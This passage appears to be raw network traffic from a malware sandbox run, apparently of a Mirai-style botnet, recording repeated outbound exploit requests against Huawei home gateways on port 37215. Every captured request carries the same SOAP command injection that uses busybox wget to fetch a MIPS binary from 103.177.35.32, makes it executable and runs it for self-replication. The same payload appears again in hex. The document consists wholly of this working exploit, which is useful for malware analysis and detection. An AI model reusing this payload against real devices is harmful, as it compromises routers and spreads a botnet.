                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2866192.168.2.234122641.46.221.23937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651465893 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2867192.168.2.234796641.110.216.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651693106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2868192.168.2.2341544197.75.255.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651694059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2869192.168.2.2351850157.246.55.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651729107 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2870192.168.2.2351962197.157.155.18937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651729107 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2871192.168.2.234782641.179.197.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651738882 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2872192.168.2.235744841.124.168.2937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651740074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2873192.168.2.2338142157.125.34.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651747942 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2874192.168.2.2344590197.205.219.6537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651751995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2875192.168.2.2345854164.243.162.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651777983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
